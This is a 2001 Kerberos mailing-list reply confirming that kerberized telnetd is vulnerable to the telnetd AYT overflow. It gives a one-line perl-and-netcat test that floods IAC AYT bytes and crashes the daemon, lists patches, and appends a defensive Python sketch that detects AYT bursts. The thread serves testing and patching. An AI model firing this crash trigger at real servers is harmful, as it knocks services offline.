[14725] in Kerberos


Re: Kerberos telnet and today's telnet vulnerability announcement

daemon@ATHENA.MIT.EDU (Voradesh Yenbut)
Tue Jul 24 18:44:23 2001

Message-Id: <200107242225.f6OMPHgs014525@vetch.cs.washington.edu>
To: John Rudd <jrudd@cats.ucsc.edu>
cc: kerberos@mit.edu
In-Reply-To: Message from John Rudd <jrudd@cats.ucsc.edu> 
   of "Tue, 24 Jul 2001 14:24:44 PDT." <3B5DE79C.F5E14EDC@cats.ucsc.edu> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 24 Jul 2001 15:25:17 -0700
From: Voradesh Yenbut <yenbut@cs.washington.edu>

Yes, it does.

I tested as suggested on the FreeBSD security list with the following command
to our kerberized telnetd, and it dumped core.

 perl -e '$c=sprintf("%c%c", 255, 246); sleep 10; print $c x1000 . "\r\n"' \
	| nc localhost 23

(The nc command is netcat-1.10 from ftp://avian.org/src/hacks/.)  

The following patches by Kerberos versions were applied to our kerberized
telnetd to temporarily plug the hole:

	ftp://ftp.cs.washington.edu/cse/patches/krb5-1.1.1.patch
	ftp://ftp.cs.washington.edu/cse/patches/krb5-1.2.2.patch

The patches were derived from an earlier version of FreeBSD patches
before the FreeBSD Security Advisory FreeBSD-SA-01:49.telnetd
(http://docs.freebsd.org/mail/current/freebsd-announce.html) was
issued, so the patches may not be up to date.

---
Voradesh Yenbut			Software Engineer, CSE
1 206 685-0912			BOX 352350,  U of Washington	
yenbut@cs.washington.edu	Seattle, WA 98195

> So, most of my machines don't use the standard vendor telnet, but
> instead use one form or another of a kerberized telnet.  Does anyone
> know if today's announcement applies to kerberized telnetd's?
> 
> http://www.securityfocus.com/bid/3064
> 
> -- 
> John "kzin" Rudd                       http://people.ucsc.edu/~jrudd
> Truth decays into beauty, while beauty soon becomes merely charm. Charm
> ends up as strangeness, and even that doesn't last. (Physics of Quarks)
>    -----===== Kein Mitleid Fu:r MicroSoft (www.kmfms.com) ======-----
> 
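
A detection-side companion to the test in the message above, added here as an example; it is not part of the original post or of any Kerberos or FreeBSD code. Bytes 255 and 246 are the Telnet IAC and AYT ("Are You There") codes, so the sketch parses a captured client-to-server stream and flags an unusual number of AYT commands; the function names and the threshold of 8 are assumptions.

```python
# Added example: count Telnet commands in a captured client-to-server stream.
IAC, SE, AYT, SB = 255, 240, 246, 250
NEGOTIATION = {251, 252, 253, 254}  # WILL, WONT, DO, DONT carry one option byte

def count_commands(stream: bytes) -> dict:
    """Return {command_byte: count} for each IAC command found in stream."""
    counts = {}
    i, n = 0, len(stream)
    while i < n:
        if stream[i] != IAC:
            i += 1                      # ordinary data byte
            continue
        if i + 1 >= n:
            break                       # truncated capture: lone IAC at the end
        cmd = stream[i + 1]
        if cmd == IAC:                  # IAC IAC is an escaped 0xFF data byte
            i += 2
            continue
        counts[cmd] = counts.get(cmd, 0) + 1
        if cmd in NEGOTIATION:
            i += 3                      # skip the option byte (it may equal 246)
        elif cmd == SB:
            i += 2
            while i < n:                # skip subnegotiation data up to IAC SE
                if stream[i] == IAC and i + 1 < n:
                    done = stream[i + 1] == SE
                    i += 2
                    if done:
                        break
                else:
                    i += 1
        else:
            i += 2                      # two-byte command such as AYT
    return counts

def is_suspicious(stream: bytes, max_ayt: int = 8) -> bool:
    """Flag a stream with more AYT commands than max_ayt (assumed threshold)."""
    return count_commands(stream).get(AYT, 0) > max_ayt

if __name__ == "__main__":
    # Constructed samples: a short normal negotiation and an AYT run.
    normal = b"\xff\xfd\x18\xff\xfb\x01login\r\n\xff\xf6"
    burst = bytes([IAC, AYT]) * 1000 + b"\r\n"
    print(count_commands(normal), is_suspicious(normal))
    print(count_commands(burst), is_suspicious(burst))
```
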



